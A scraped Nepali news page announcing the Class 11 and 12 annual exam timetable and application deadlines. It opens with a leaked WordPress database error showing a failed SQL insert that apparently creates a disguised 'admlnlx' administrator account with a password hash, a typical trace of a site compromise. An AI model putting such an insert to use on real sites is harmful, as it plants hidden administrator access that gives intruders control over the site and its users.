WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BbyPmmzwtHxc8y5.9QmNxAunhHAB.A0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 12:54:54', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ १६–
राष्ट्रिय परीक्षा बोर्ड, परीक्षा नियन्त्रण कार्यालय भक्तपुरले यस वर्षको कक्षा ११ र १२को वार्षिक परीक्षाको समयतालिका आज सार्वजनिक गरेको छ ।
परीक्षा नियन्त्रण कार्यालयले सार्वजनिक गरेको सूचना अनुसार आगामी वैशाख १० गतेदेखि वैशाख २२ गतेसम्म कक्षा १२ को परीक्षा हुनेछ । त्यस्तै वैशाख २४ गतेदेखि जेठ ३ सम्म कक्षा ११ को परीक्षा हुनेछ। २०७४ सालको वार्षिक परीक्षामा सहभागी हुने परीक्षार्थीहरुले आगामी माघ मसान्तभित्र परीक्षा आवेदन फाराम भरिसक्नुपर्ने सूचनामा जनाइएको छ। उक्त समयसम्ममा छुटेका परीक्षार्थीले थप शुल्कसहित फागुन १५ गतेसम्म आवेदन फारम बुझाउन पाउनेछन्।